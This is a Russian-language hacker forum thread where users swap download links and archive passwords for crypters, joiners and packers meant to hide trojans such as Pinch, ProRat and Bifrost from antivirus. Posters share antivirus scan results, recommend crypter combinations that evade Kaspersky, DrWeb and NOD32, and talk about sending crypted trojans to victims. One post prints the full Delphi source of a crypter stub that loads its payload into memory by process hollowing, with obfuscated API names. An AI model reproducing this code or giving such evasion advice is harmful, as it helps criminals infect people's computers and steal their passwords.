Вот решил выложить несколько крипторов.

ICrypt 1.1. *
nme 1.1*
PolyCrypter 1.2 *
RCryptor 1.6 *
RCryptorPrivateVersion 1.3.rar *


Cсылка http://rapidshare.com/files/17114782/Crypters.rar.html
pas-3gs452GF5wtyFGD$@%#$@

PolyCrypter 1.2 *
http://www.forum.pyccxak.com/viewtopic.php?id=1463

RCryptor (http://rapidshare.com/files/17067205/RCrypter.rar.html) - в архиве 5 версий этого криптора, последние версии возможно еще не детектируются.
SimpleCryptor (http://rapidshare.com/files/17067621/SimpleCryptor.rar.html) - криптор, говорят также не детектируется AV.
За предоствленне крипторы отдельное спасибо юзеру Artlonger, а также топику Смерть Барыгам (http://exploit.in/forum/index.php?showtopic=7206) на eXploit.in (http://exploit.in/forum)

hsi
Видно это нетакие уж приватные крипторы чтоб их под пасом ставить.
RCryptor добавел 2 нехватающие версии.

http://rapidshare.com/files/17122093/Cryptor.rar.html

http://slil.ru/24027872

Mo4x™
Крипторы выложены в слествие барыжничества ими. Некоторые не палятся и их вполне можно использовать по назначению.

RCryptor - в архиве 5 версий этого криптора, последние версии возможно еще не детектируются. определяется
SimpleCryptor - криптор, говорят также не детектируется AV. а этот не определяется, спасибо лови плюс

AntiVir Found nothing
ArcaVir Found Heur.W32.Generic
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
F-Secure Anti-Virus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
VirusBuster Found nothing
VBA32 Found Trojan-PSW.Pinch.2 (paranoid heuristics) (probable variant)

Это скан Симплкриптора. Мб я параноик, но открывать не буду.

Lizardman
Только что проверил на VM, криптор не создает никаких файлов и веток в реестре при запуске.
Подозрение на троян выдается потому что сигнатура для криптования у него одна и, видимо, на исследование в AV попадали файлы закриптованные этим криптором и, соответственно, соержащие его сигнатуру.

LizardmanIMHO, ты не параноик
Found Trojan-PSW.Pinch.2 (paranoid heuristics) (probable variant)
мне интересно почему AntiVir не опозал коня

>мне интересно почему AntiVir не опозал коня
Потому что это не конь.
Бери в руки FileMonitor, Registry monitor, TCPVeiw и в путь.

полиморфный криптор SyperCrypt

http://filearchiv.ru/1868987577

полиморфный криптор SyperCrypt

http://filearchiv.ru/1868987577
Это случаем не трой? (Закриптованный)
Резалты джотти ничего не показали,как и вирустотала.

полиморфный криптор SyperCrypt

http://filearchiv.ru/1868987577
Шутник однако!!! :D

Есле ктото боится скачивать по ссылки vasya_rogov.
То кочаите по вот этой http://ifolder.ru/1477554.
Выкладывал salamandra вроде чел нормалный
копираиты софта туть
http://damagelab.nukleon.us/index.php?showtopic=17434&st=0

баянчег, но всёже

ABC joiner final.
Последняя версия ABC joinera by ZLOY. Пока что вроде как ничем не палится.
software.gif Скачать|Download
_http://depositfiles.com/files/1050031
topic.gif Пароль: 2541

ASD cryptor вроде как метаморф криптор, до недавнего времени бывший приватом. Палится нодом, каспер и веб молчат.
software.gif Скачать|Download
_http://depositfiles.com/files/1049962
topic.gif Пароль: 5628

Crypt. Так и называется. Консольный. Чем палится, чем нет-хз.+сорцы
software.gif Скачать|Download
_http://depositfiles.com/files/1052030
topic.gif Пароль: damagelab.org

GSJoiner. Джойнер. Также хз чем палится, чем нет.+сорцы
software.gif Скачать|Download
_http://depositfiles.com/files/1052035
topic.gif Пароль: damagelab.org

Далее выкладываю кучу сорцов джойнеров. Взято с kiber-zona.org

2Ex Binder
software.gif Скачать|Download
_http://depositfiles.com/files/1052035

AFX Executable Binder PRO
software.gif Скачать|Download
_http://depositfiles.com/files/1052094

Binding
software.gif Скачать|Download
_http://depositfiles.com/files/1052098

Gbind
software.gif Скачать|Download
_http://depositfiles.com/files/1052127

ExeJoinerTM-1
software.gif Скачать|Download
_http://depositfiles.com/files/1052117

Joiner_by_HightTek_Delf_SRC
software.gif Скачать|Download
_http://depositfiles.com/files/1052103

Joiner Delphi
software.gif Скачать|Download
_http://depositfiles.com/files/1052108

topic.gif Пароль: damagelab.org на все архивы с сорцами.

хаха, аффтар SuperCrypt'а жжот!
но, просит не говорить :)

баянчег, но всёже


ASD cryptor вроде как метаморф криптор, до недавнего времени бывший приватом. Палится нодом, каспер и веб молчат.



каспер палит

Fols
Что то я не понял что там качать за место криптора прикол???
Входеш по этой сылке и кочаеш
http://ifolder.ru/1477554.

Pestil V1.0, a crypter :)
by йух
http://www.cigicigi.net/files/pestileng.JPG

Written in Delphi

Stub : 6 kb ( 4kb packed )

If you get errors while protecting,run program in safe mode(there is an option on agreement page)


What can i do with this program?
--------------------------------

[+]You can make any virus/Remote Administration Tool undedected.(scantime and runtime)

[+]You can prevent your programs.

[+]You can compress your programs.

[+]You can use it to change programs's icons.

Usage :
-------
[1]Drag and drop the file that you want to protect or press 'Select File' button and chose it.
[2]Choose your options(icon,version info,algorith) and protect it.
[3]Your crypted file is ready,now you can use it..


Properties :
------------

[+]Pestil uses XOR encryption and 3 different compression algoritm.

[+]Small stub.

[+]Pestil preserve EOF data automatically.So you can also crypt Flux,Bifrost,Poison Ivy,etc.. servers.

[+]Tested on Vista.

Here are the links :
http://www.cigicigi.net/files/Pestil.rar
http://rapidshare.com/files/40622726/Pestil.rar

Лови +, работает.
Закриптовал ProRat сервер, только склиент теперь не хочет конектиться к сервееру, пишет типа сервер изменён

Лови +, работает.
Закриптовал ProRat сервер, только склиент теперь не хочет конектиться к сервееру, пишет типа сервер изменён

юзай версию SE

Воть есть тут http://forum.antichat.ru/thread40562-ProRat.ht****ml

SimbiOZ v 1.3

http://slil.ru/24600368

(з.ы. несмотрите что у меня сообщений мало - троянов я туда не пихал :D )

SimbiOZ v 1.3

http://slil.ru/24600368

(з.ы. несмотрите что у меня сообщений мало - троянов я туда не пихал :D )
какая разница, усе равно он палится как минимум касперским... вот постик _http://forum.kaspersky.com/lofiversion/index.php/t36341.html

2 spawn89, когда-то искал связки паблик крипторов, связка симбиоз + afix от каспера точно прятала, сейчас не знаю, может и палится

Grob_t, ты почитай тот постик, по ссылке, кот я выложил.. там уже какой то умник-антипинчер выложил сигнатуринку симбиоза версии 1,3 + некоторых других крипторов, так что в связке симбиоз афикс, симбиоз будет бесполезен против каспа..
Ребята зачем флеймом страдать просто выложите крипторы которые не палятся
ато тему сасараите.
выложить, то выложим, но зачем?? чтобы завтра он спалился?? пффф....

spawn89, точно, уже палится, еще связка RCryptor 1.6 + RCryptor 1 тоже недавно каспером не палилась, теперь хз, а вообще от каспа до сих пор можно легко ручками скрыть троя, пару раз сменив точку входа, остальные уже этот фокус давно секут

Скачать: exesax-0.9.1 (http://rapidshare.com/files/29733034/exesax-0.9.1.rar)
Скачать: QrYPt0r (c) NuTraL Poly (http://rapidshare.com/files/29733130/QrYPt0r__c___NuTraL_Poly.rar)
Скачать: Werus Cryptor Public 1.0 (http://rapidshare.com/files/29733217/Werus_Cryptor_Public_1.0.rar)

А может создать тему "Криптовка" , и там пусть будут просьбы о крипте, а те кто умеют криптовать пусть криптуют, зато критпторы палиться дольше не будут.

spawn89, точно, уже палится, еще связка RCryptor 1.6 + RCryptor 1 тоже недавно каспером не палилась, теперь хз, а вообще от каспа до сих пор можно легко ручками скрыть троя, пару раз сменив точку входа, остальные уже этот фокус давно секут
ты с 7-кой попробуй такое проделать ;)


кстати авира стала палить весь паблик
вот таким детектом: TR/Crypt.XPACK.Gen
даже приватный джойнер палить стала :eek: .. а кроме нее никто не палит

чем\как ее обдурить

Мля, есть хоть один криптор на данный момент который делает то, для чего и был создан?!! А то уже все эти палятся :(

З.ы. Если на вирустотале отметить галочку "Do not distribute the sample", то они не будут отправлять пинча на проверку ав компаниям или как?

Мля, есть хоть один криптор на данный момент который делает то, для чего и был создан?
есть, в привате таких завались...
З.ы. Если на вирустотале отметить галочку "Do not distribute the sample", то они не будут отправлять пинча на проверку ав компаниям или как?
точно тебе ответит только представитьтель VT..

Да имхо уже приватные криптора и то паляться. Просто на данный момент, я не вижу чтобы появлялись новые криптора!

Да имхо уже приватные криптора и то паляться. Просто на данный момент, я не вижу чтобы появлялись новые криптора!
ХМ.. а кагже приватные криптора от Васка??? Да если
ещё и индевидуальные???

а если всеми паблик криптарами по очереди закриптовать? :) будет палиться?

будет палиться?

скорее всего да. и весить будет прилично =\

мдееее... точно... сп*здил у кого то.. или подарили, что ваще ппц нереально (50 бакинских всем подрят дарить, каму слабо??)))
мб, ссылку обрать?? а фигли... палится ведь начнет, и нах он нужен такой буит..

Я бы на месте модеров потер тему. Тем более что один из них аж изорался, когда технологии васка юзались в самописных крипторах=)

vasya_rogov
А тебе автор разрешил выкладывать этот криптор?

мдееее... точно... сп*здил у кого то.. или подарили, что ваще ппц нереально (50 бакинских всем подрят дарить, каму слабо??)))
мб, ссылку обрать?? а фигли... палится ведь начнет, и нах он нужен такой буит..

Он уже палится , хотя мож что делаю не так :confused:

Fols
Все делаешь так у меня тоже палется

Удилил я !
Причина выкладывание приват софта в паблик.

лови (http://www.yandex.ru/yandsearch?rpt=rad&text=%F5%EE%F0%EE%F8%E8%E9+%EA%F0%E8%EF%F2%EE%F0)
однако приколист а если так сделать приватный криптор с-SpyfeR. Хи которого до сих пор ни у кого нету

а если всеми паблик криптарами по очереди закриптовать? будет палиться?
смотря как криптануть))))
вот я криптанул раз 5-6 разными криптами (паблик) пинча от васьки и палит только Avg)) и пинч работает суперово)
кому интересно?
P.s. в весе трой прибавил не более 10 кб при том что ещё и клеить можно)

Netster поделись связкой чем криптовал?
если не трудно в аську кинь плиз =)
8000-9-0-9

Хочу проверить один забавный спрособ криптовки :) первым 3м пиплам скинувшим пм мну закриптую пинч 3 от Kaspersky\Nod32\DrWeb должно прокатить

смотря как криптануть))))
вот я криптанул раз 5-6 разными криптами (паблик) пинча от васьки и палит только Avg)) и пинч работает суперово)
кому интересно?
P.s. в весе трой прибавил не более 10 кб при том что ещё и клеить можно)
открою маленький секрет, после клея криптить надо и что бы работало, а не самого понкика

Нашол ссылку на какомто забугорном сайте каитаицэв.
http://rapidshare.com/files/47447225/New_Cruptor.exe.html

']Нашол ссылку на какомто забугорном сайте каитаицэв.
http://rapidshare.com/files/47447225/New_Cruptor.exe.html
Хм..троян скорее всего криптованый кидаеш..учи новые способы впаривания..

Васькин криптор прячет от проактивки касперского ? если нет , то у кто может спрятать от проактивки ? естсественно за ВМЗ

']Нашол ссылку на какомто забугорном сайте каитаицэв.
http://rapidshare.com/files/47447225/New_Cruptor.exe.html


DrWeb палит как Trojan.MulDrop.7963

UnDo Crypter 1.5 Public Version

* Bugfixes
* Currently Undetectable from all AntiVirus
* Stub size is 4.50kb packed with UPX
* has a small compression ratio for unpacked files
* source code and private versions are for sale (contact i.am.noble.com@gmail.com for details)
* bifrost server example 28.3kb / 32.8kb crypted
* can change crypted file icon


http://img442.imageshack.us/img442/6592/undo15js1.jpg

tyt (http://rapidshare.com/files/37170584/UnDo_Crypter.rar.html )

Ну и как им криптовать?

ЗЫ: Только у меня он почемуто другой получился :confused:

http://mescalin.iplot.ru/1.jpg

не качал, но судя по скрину надо exe-шник перетянуть на поле :)

Mescalin,у меня все гуд хз что за янйух у тебя.

у меня все гуд хз что за янйух у тебя

Вообщето работает,но ты сравни скрины!!!

ЗЫ: каспер палит :(

Mo4x™, Замечательно !!!! Но проактивка каспера ловит!!!

Fols,а что всем каму ты пихаеш закриптованы пинчь ани пользуется каспером?

Fols,а что всем каму ты пихаеш закриптованы пинчь ани пользуется каспером?

Нет канечно но я сделал так , взял пабличный RCryptor крептонул им далее тем что выложил ты ;
Вот собственно результат
AntiVir 7.4.0.57 2007.08.09 ADSPY/DuncanMonitor.D
AVG 7.5.0.476 2007.08.09 Packed.UnDo
eSafe 7.0.15.0 2007.08.10 suspicious Trojan/Worm
Ewido 4.0 2007.08.09 Dropper.Small
Panda 9.0.0.4 2007.08.09 Spyware/DuncanMonitor
Webwasher-Gateway 6.0.1 2007.08.10 Ad-Spyware.DuncanMonitor.D
из 32 палет токо 6
ps: долго ли протянет :D

из 32 палет токо 6
ps: долго ли протянет :D
А ты почаще на тотал кидай, и желательно с названием pinch3 :D

А ты почаще на тотал кидай, и желательно с названием pinch3 :D
Ну меня учить не нужно, это для эксперемента так как использовалось 2а криптора и проводилось 1 раз :D

Fols, а что ты думал паблик криптор палится не будет ?

Вот зто чудо я нашел в паблике :D

http://mescalin.iplot.ru/sshot-3.png

качать тут (http://mescalin.iplot.ru/X-Hider.rar)

Pass antichat

ЗЫ: сами понимаете,что нашел я его в паблике,так что качаете на свой страх и риск!!!

Вот зто чудо я нашел в паблике :D

http://mescalin.iplot.ru/sshot-3.png

качать тут (http://mescalin.iplot.ru/X-Hider.rar)

Pass antichat

ЗЫ: сами понимаете,что нашел я его в паблике,так что качаете на свой страх и риск!!!
Во первых некачается,во вторых я уже его и сам нашел ;)
Исходни4ки гавно стаба :p
program Stub;

{$IMAGEBASE $44440000}

uses
Windows;

var
z: integer;
_FILE_

var
xorkey, xorkeyconst, xorkeyvar: byte;

type
TSections = array [0..0] of TImageSectionHeader;

function nud_emulator(FileName: string): DWORD;
var
F: file of DWORD;
P: Pointer;
Fsize: DWORD;
Buffer: array [0..500] of DWORD;
begin
FileMode := 0;
AssignFile(F, FileName);
Reset(F);
Seek(F, FileSize(F) div 2);
Fsize := FileSize(F) - 1 - FilePos(F);
if Fsize > 500 then Fsize := 500;
BlockRead(F, Buffer, Fsize);
Close(F);
P := @Buffer;
asm
xor eax, eax
xor ecx, ecx
mov edi , p
@again:
add eax, [edi + 4*ecx]
inc ecx
cmp ecx, fsize
jl @again
mov @result, eax
end;
end;

function encodestr(instr: string): string;
var
i, j: integer;
begin
result := '';
j := 137;
for i := 1 to length(instr) do
begin
result := result + chr(ord(instr[i]) xor j);
if j = 255 then j := 1 else inc(j);
end;
end;

procedure nud_decrypt(var arr: array of byte);
var
i, j: integer;
begin
j := xorkey;
for i := 0 to length(arr) - 1 do
begin
arr[i] := arr[i] xor j xor $32*2;
if j = 255 then j := 1 else inc(j);
end;
end;


function NDSize(sz: dword; al: dword): dword;
begin
if ((sz mod al) = 0) then
begin
Result := sz;
end
else
begin
Result := ((sz div al) + 1) * al;
end;
end;


// winapi

type
DWORD = LongWord;
BOOL = LongBool;
LPCSTR = PAnsiChar;
UINT = LongWord;
FARPROC = Pointer;

PSecurityAttributes = ^TSecurityAttributes;
_SECURITY_ATTRIBUTES = record
nLength: DWORD;
lpSecurityDescriptor: Pointer;
bInheritHandle: BOOL;
end;
TSecurityAttributes = _SECURITY_ATTRIBUTES;
SECURITY_ATTRIBUTES = _SECURITY_ATTRIBUTES;

POverlapped = ^TOverlapped;
_OVERLAPPED = record
Internal: DWORD;
InternalHigh: DWORD;
Offset: DWORD;
OffsetHigh: DWORD;
hEvent: THandle;
end;
{$EXTERNALSYM _OVERLAPPED}
TOverlapped = _OVERLAPPED;
OVERLAPPED = _OVERLAPPED;
{$EXTERNALSYM OVERLAPPED}

const
MAX_PATH = 260;
GENERIC_WRITE = $40000000;
FILE_SHARE_WRITE = $00000002;
CREATE_NEW = 1;
INVALID_HANDLE_VALUE = DWORD(-1);
kernel32 = 'kernel32.dll';


var
nud_mem: function (hProcess: THandle; const lpBaseAddress: Pointer; lpBuffer: Pointer;
nSize: DWORD; var lpNumberOfBytesWritten: DWORD): BOOL; stdcall;
nud_create: function (lpApplicationName: PChar; lpCommandLine: PChar;
lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
lpCurrentDirectory: PChar; const lpStartupInfo: TStartupInfo;
var lpProcessInformation: TProcessInformation): BOOL; stdcall;
nud_read: function (hProcess: THandle; const lpBaseAddress: Pointer; lpBuffer: Pointer;
nSize: DWORD; var lpNumberOfBytesRead: DWORD): BOOL; stdcall;
nud_alloc: function (hProcess: THandle; lpAddress: Pointer;
dwSize, flAllocationType: DWORD; flProtect: DWORD): Pointer; stdcall;


function LoadLibrary(lpLibFileName: PChar): HMODULE; stdcall; external kernel32 name 'LoadLibraryA';
function GetProcAddress(hModule: HMODULE; lpProcName: LPCSTR): FARPROC; stdcall; external kernel32 name 'GetProcAddress';
function GetTempPath(nBufferLength: DWORD; lpBuffer: PChar): DWORD; stdcall; external kernel32 name 'GetTempPathA';


procedure stealth;
var
hkernel: thandle;
begin
hkernel := LoadLibrary(pansichar(encodestr('впщвивјў� �цяш')));
@nud_mem := getprocaddress(hkernel, pansichar(encodestr('ЮшвшиЮэятчазШу� �члг')));
@nud_create := getprocaddress(hkernel, pansichar(encodestr('КшонщлЯвюсцзжЧ' )));
@nud_read := getprocaddress(hkernel, pansichar(encodestr('ЫпкиЭьауфбаЩры� �ка')));
@nud_alloc := getprocaddress(hkernel, pansichar(encodestr('ЯгщшшпгСэюьчРо' )));
end;

procedure nud_copy(Destination: Pointer; Source: Pointer; Length: DWORD);
var
i :integer;
begin
i := i + $23 xor 178;
if i = i then
Move(Source^, Destination^, Length);
end;

procedure StartMemory(nf: pointer);
var
BaseAddress, Bytes, HeaderSize, InjectSize, SectionLoop, SectionSize: dword;
Context: TContext;
FileData: pointer;
ImageNtHeaders: PImageNtHeaders;
InjectMemory: pointer;
ProcInfo: TProcessInformation;
PSections: ^TSections;
StartInfo: TStartupInfo;
begin
ImageNtHeaders := pointer(dword(dword(nf)) + dword(PImageDosHeader(nf)._lfanew));
GetMem(InjectMemory, InjectSize);
try
FileData := InjectMemory;
HeaderSize := ImageNtHeaders.OptionalHeader.SizeOfHeaders;
PSections := pointer(pchar(@(ImageNtHeaders.OptionalHeader)) + ImageNtHeaders.FileHeader.SizeOfOptionalHeader);
for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do
begin
if PSections[SectionLoop].PointerToRawData < HeaderSize then HeaderSize := PSections[SectionLoop].PointerToRawData;
end;
nud_copy(FileData, nf, HeaderSize);
FileData := pointer(dword(FileData) + NDSize(ImageNtHeaders.OptionalHeader.SizeOfHeaders , ImageNtHeaders.OptionalHeader.SectionAlignment));
for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do
begin
if PSections[SectionLoop].SizeOfRawData > 0 then
begin
SectionSize := PSections[SectionLoop].SizeOfRawData;
if SectionSize > PSections[SectionLoop].Misc.VirtualSize then SectionSize := PSections[SectionLoop].Misc.VirtualSize;
nud_copy(FileData, pointer(dword(nf) + PSections[SectionLoop].PointerToRawData), SectionSize);
FileData := pointer(dword(FileData) + NDSize(PSections[SectionLoop].Misc.VirtualSize, ImageNtHeaders.OptionalHeader.SectionAlignment));
end
else
begin
if PSections[SectionLoop].Misc.VirtualSize <> 0 then FileData := pointer(dword(FileData) + NDSize(PSections[SectionLoop].Misc.VirtualSize, ImageNtHeaders.OptionalHeader.SectionAlignment));
end;
end;
stealth;
ZeroMemory(@StartInfo, SizeOf(StartupInfo));
ZeroMemory(@Context, SizeOf(TContext));
nud_create(nil, pchar(ParamStr(0)), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
Context.ContextFlags := CONTEXT_FULL;
GetThreadContext(ProcInfo.hThread, Context);
nud_read(ProcInfo.hProcess, pointer(Context.Ebx + 8), @BaseAddress, 4, Bytes);
nud_alloc(ProcInfo.hProcess, pointer(ImageNtHeaders.OptionalHeader.ImageBase), InjectSize, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE);
nud_mem(ProcInfo.hProcess, pointer(ImageNtHeaders.OptionalHeader.ImageBase), InjectMemory, InjectSize, Bytes);
nud_mem(ProcInfo.hProcess, pointer(Context.Ebx + 8), @ImageNtHeaders.OptionalHeader.ImageBase, 4, Bytes);
Context.Eax := ImageNtHeaders.OptionalHeader.ImageBase + ImageNtHeaders.OptionalHeader.AddressOfEntryPoint;
SetThreadContext(ProcInfo.hThread, Context);
ResumeThread(ProcInfo.hThread);
finally
FreeMemory(InjectMemory);
end;
end;
procedure nud_loader;
var
tmb: array [0..MAX_PATH] of char;
begin
gettemppath(MAX_PATH, tmb);
xorkeyconst := ord(tmb[2]) + ord(tmb[3]);
xorkeyvar := _XORKEYVAR_ + z - z; //Decrypting Key
xorkey := xorkeyconst xor xorkeyvar;
nud_decrypt(ff);
if @ff[0] <> nil then
StartMemory(@ff[0]);
end;


function GetWnd(var S: String): Boolean;
var
Len: Integer;
begin
Len := Windows.GetWindowsDirectory(nil, 0);
if Len > 0 then
begin
SetLength(S, Len);
Len := Windows.GetWindowsDirectory(PChar(S), Len);
SetLength(S, Len);
Result := Len > 0;
end else
Result := False;
end;

var
FSize: DWORD;
DestHFile: THandle;
DestFile : string;
st: string;
begin
DestFile := encodestr('c:\0000001.dat');
DestHFile := CreateFile(pchar(DestFile),GENERIC_WRITE,FILE_SHAR E_READ,nil,CREATE_ALWAYS,0,0);
FSize:=GetFileSize(DestHFile,nil);
nud_loader;
end.

Это переделанный флай криптор. Причем так криво шо аж пипэц.

угу, первой версии, _Global_ олень, так код испартачить =\\

А не у кого нету сырков Fly криптера 4.0 хочу посмотреть на полиморф =)) он наверно там ацккий ,если есть киньте в личку )

У меня только 1 версии. Да.. было бы интеересно=)

Валялись на жестяке 2 симбиоза. Один из них версии 2.1
http://slil.ru/24754870
хоть и палятся... но мож кому нада)

Народ выложите нормальный криптор который не палится антивирями

http://photo6.yupoo.com/20070807/184115_115722430_ncytbinx.jpg

скачать (http://www.box.net/shared/zpn6g4q5hd)

Так и не смог разобраться )) постояно вылетает ошибка.

чет я все сделал непонял как криптовать сам файл, нажимаю Make Ud ничего он не криптует

Dcstajiker, руки кривые, трои криптуются

grob_t
Напиши руководитель по пользованию крипторов .

все же просто :) походу DCSTAJIKER просто add не нажал, тока щас понял

Крипт php

Качать (http://mescalin.iplot.ru/crypt.zip)

http://photo6.yupoo.com/20070807/184115_115722430_ncytbinx.jpg

скачать (http://www.box.net/shared/zpn6g4q5hd)

Угу, обновленный Каспер не палит, но и трой сам после криптования работать перестает :)

Сообщение от Mescalin
Вот зто чудо я нашел в паблике



качать тут

Pass antichat

ЗЫ: сами понимаете,что нашел я его в паблике,так что качаете на свой страх и риск!!! А это кто-нибудь пробовал?

Угу, обновленный Каспер не палит, но и трой сам после криптования работать перестает :)
хз, я ксинча криптовал работает и не палится

Угу, обновленный Каспер не палит, но и трой сам после криптования работать перестает :)

угу ! трой не работает ...
:(

У меня тож не работает,все время вылетает ошибка "Invalid pointer operation" Скажите че не так то делаю.

-Ну теперь каждый напишет что у него не пашет криптор что ли ?
-Все работаспасобно для криптования троянов не порите чепуху.

У меня тоже ксинч. После криптования файл не открывается и требует rtl70.bpl. Файл библиотеки, который у вас наверняка есть, если на компе установлен Делфи. У меня его не было, я скачала этот файл отдельно, и закриптованный ксинч теперь великолепно запускается. Правда, учитывая маленькую вероятность, что у клиента есть этот rtl70.bpl, я бы не стала посылать ему трой, закриптованный таким образом. Надежней будет закриптовать другим криптором.
ИМХО :)

RPolyCrypt 1.4.1


http://rosgot.jino-net.ru/rpoly.jpg

Полиморф криптор от васька, все его возможности наглядно видно из скриншута

Качаем (http://rosgot.jino-net.ru/RPolyCrypt.rar)
Пасс: xeka.ru

-Ну теперь каждый напишет что у него не пашет криптор что ли ?
-Все работаспасобно для криптования троянов не порите чепуху.
ХЗ у меня тоже трой перестаёт работать после криптовки ))

RPolyCrypt 1.4.1


http://rosgot.jino-net.ru/rpoly.jpg

Полиморф криптор от васька, все его возможности наглядно видно из скриншута

Качаем (http://rosgot.jino-net.ru/RPolyCrypt.rar)
Пасс: xeka.ruКаспер палит. Причем он так и пишет: вирус Packed.Win32.PolyCrypt.b :)

512, надо непалящийся - покупай, в паблике все палится, привыкай

каспер на самом деле многое палит, но не все так безнадежно .....
берем старенький RCryptor 1.1, криптуем.. палит ? вот **** :)
далее пакуем это дело FSG 2.0 - и уже не палит =)

http://slil.ru/24765925
fsg2.0 +RCryptor 1.1

RPolyCrypt 1.4.1


http://rosgot.jino-net.ru/rpoly.jpg

Полиморф криптор от васька, все его возможности наглядно видно из скриншута

Качаем (http://rosgot.jino-net.ru/RPolyCrypt.rar)
Пасс: xeka.ru
Перезалейте кому не сложно.

Забейте..палитьЦЦа почти всем..

http://mescalin.iplot.ru/Aver.jpg

Качать (http://mescalin.iplot.ru/averC.rar)
пасс: antichat

Хм зачем опции изи и хард?=)

The_Zone (http://www.kiber-zona.org/index.php?act=Attach&type=post&id=329)

[F3L1KS] Crypter/Packer Pack 2007 Aug 13

!Epack.zip
-USC Private.rar
aase.zip
AntiDote_v1.4_SE.zip
AREA 51 Cryptor.zip
ArexX_Simple_PI_Crypter.rar
ASPack 2.12.zip
AZProtect.zip
BIP.rar
Bonsai Crypt Final unpacked 2.zip
Celsius_Crypt_2 S.E.zip
Cexe (NT Only).zip
CryptX 1.0.zip
Daemon Crypt V2 N0NPublic.zip
DalKrypt 1.0.zip
Deception4_FUD by haZl0oh.zip
Diet.zip
Enigma Protector 1.16.zip
ExE Evil v1.0.zip
exe32pack.zip
EXEFog.zip
EXESmasher 1.0.zip
FakeNinja - PrivateRelase.zip
fEaRz Crypter v1.0.zip
fEaRz_Packer_v0.3__Private-1_.rar
FSG v1.33.zip
FSG v2.0.zip
HaZ 4 PreZidentbwst 5.0 armadillo.zip
ICrypt 1.0.rar
ICrypt 1.0.zip
IProtect.zip
Krypton v0.3.zip
Lzexe1.00a.zip
Marjinz.zip
Mew 11 SE v1.2.zip
MoleBox 2.6.1.zip
Morphine v1.5.zip
Morphine v1.6.zip
Morphine v1.7.zip
Morphine v1.9.zip
Mr. Undectetable.zip
nakedpack.zip
NeoLite v2.0.zip
nme_1.1.rar
nPack 1.1.300.zip
NsPack v3.4 Full Cracked.zip
NT Packer.zip
Open Crypter.zip
Pack 1.0.zip
Packman 1.0.zip
PECompact v2.64 Full.zip
PEncrypt 4.0.zip
PEPack 1.0.zip
Pestil.rar
Petite 2.2.zip
Pex 0.99.zip
Phantom.zip
PKLite32 1.0.zip
pOke Crypter.rar
Private EXE Protector 2.0.zip
PS Crypter.rar
Pussy_Crypter_pub_stub.rar
RAT Packer.zip
RLPack 1.16 Basic Edition.zip
RLPack 1.17 Personal Edition.zip
RLPack Modifier Edition.zip
Scofield's Cryptor 1.1.zip
Scramble Tool v0.2.2 rc1.zip
SDC 1.2.zip
Selassi Binder haZl0oh.rar
shrnkEXE.zip
SkD Undetectabler Pro 2.0.zip
Stud v1.0 Crypter.zip
tElock 0.98.zip
UC-v1.0PUB.rar
Underground Crypter 1.0.zip
Undetector 1.2.zip
UnDo_Crypter.zip
unkOwn Crypter 1.0.zip
UnLimited_Crypter_v1.0.zip
UPX Crypt.zip
UPX v1.08w.zip
UPX v1.24w.zip
UPX v1.25w.zip
UPX˙v2.02w.zip
Wind Of Crypt 1.0.zip
WinLite.zip
WWPACK 3.05.zip
Yoda's Crypter v1.3.zip

Link : http://rapidshare.com/files/48740093/_F3L1KS__Crypter_Pack_2007_Aug_13..zip

n0153r

-Это уже левый пак он у миня ине только у миня очень давно валяется на компе .

Кто-нибудь тестил крипторы из архивчика?
Подскажите плз комбинацию паблик крипторов чтобы хотябы не палили Kasper, DrWeb, Nod32.

Trimz , Morphnah+PolyCrypter 1.2+Pohernah 1.3

NeXArmAor, спасибо!
Если не сложно ты выложи эти крипторы.
А криптовать в таком порядке? и какие опции ставить в крипторах?

Trimz, можно использовать любые комбинации...но если криптуеш пинча,тогда так :
сначала похернах(ставиш галочку на Pinch3 or Microjoiner),потом поликриптер со всеми включенными опциями. Морф тоже неплохо криптует. Если хочеш могу выложить все эти крипторы.

Trimz, тут (http://webfile.ru/1513631) сам криптор.
Пароль antiav

Спасибо скачал.
Попробовал Pohernah+Poly Crypter. Палится всем кроме nod32
Пытаюсь третьим закриптить Morphnah'ом - не криптует. Выдает ошибку.

NexArmAor, есть есть возможность, стукни в асю плз 298867

засада, похоже каспер недавним апдейдом весь паблик спалил..

1.AverC
2.Morphbeta
3.Pohernah
4.RCrypror [private] уже в паблике
-------------------------------------------------
http://virusscan.jotti.org/
-------------------------------------------------
A-Squared Found nothing
AntiVir Found nothing
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
CPsecure Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
F-Secure Anti-Virus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
Panda Antivirus Found nothing
Rising Antivirus Found nothing
Sophos Antivirus Found nothing
VirusBuster Found nothing
VBA32 Found nothing

пока ето та самая заветная комбинация, но не надолго я так думаю...

RCryptor: 1.1, 1.3, 1.4, 1.5, 1.6b, 1.6c, 1.6d, RCryptor [private] 1.3b, RCryptor [private] V2.0
RPolyCrypt: 1.0b, 1.4.1, 1.4.2
RJoiner: 1.2a
ТуТ (http://forum.xeka.ru/showthread.php?t=280)

Там регатся надо вот прямые ссылки:
RCryptor: 1.1, 1.3, 1.4, 1.5, 1.6b, 1.6c, 1.6d, RCryptor [private] 1.3b, RCryptor [private] V2.0
RPolyCrypt: 1.0b, 1.4.1, 1.4.2
_http://depositfiles.com/files/1623576
_http://rapidshare.com/files/52071334/RC_RPC.rar.html
_http://ifolder.ru/3155429
_http://shareua.com/files/c6778c/RC_RPC.rar.html
_http://zalil.ru/24793021
_http://www.uploading.com/files/WD4DKMX8/RC_RPC.rar.html

Размер: 636.46 KB
Пароль: xeka.ru

RJoiner 1.2a
http://slil.ru/24798306
Pass: xeka.ru

каспер спалил все пабликовые RPolyCrypt 1.0 - 1.4.2 причем как то хитро очень, теперь даже в миксе 5-6 паблик-крипторов всеравно палит :eek:

